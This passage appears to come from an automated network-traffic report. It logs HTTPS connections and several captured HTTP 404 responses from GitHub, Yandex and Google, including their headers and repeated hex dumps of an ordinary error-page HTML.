          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Thu, 29 Sep 2022 12:59:27 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgradeExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECTAccept-CH-Lifetime: 31536000Cache-Control: no-cache,no-store,max-age=0,must-revalidateConnection: CloseContent-Length: 17227Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664456400.14977.98504.81981&h=stable-morda-any-vla-yp-11&yandexuid=3518356691664456400;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.netContent-Type: text/html; charset=UTF-8Date: Thu, 29 Sep 2022 13:00:00 GMTExpires: Thu, 29 Sep 2022 13:00:00 GMTLast-Modified: Thu, 29 Sep 2022 13:00:00 GMTNEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}Set-Cookie: _yasc=qLvD90cuW3++pDJfAIJW5C/OyI/i8ORtD2rdhlV+G6SpeC0q; domain=.yandex.ru; path=/; expires=Sat, 29-Oct-2022 13:00:00 GMT; secureSet-Cookie: _yasc=QQnXkKdfaiZ1JE/MgcSPjIuyUq4Zc2j13hMJ2mq4X8OOweZx; domain=.yandex.ru; path=/; expires=Sat, 29-Oct-2022 13:00:00 GMT; secureSet-Cookie: i=kjZv/vRDYZ7Mz8JhWgFMKOt8ORqJNYHxnoKNAtcuW//hbmpqcgjDvowb0EkcZx9B6PfS97LwnsJCAXIgvStyDTp+vOI=; Expires=Sat, 28-Sep-2024 13:00:00 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnlyVary: Cookie,Accept-Language,Accept-EncodingX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 12:59:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 12:59:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 12:59:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 12:59:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 12:59:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 12:59:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 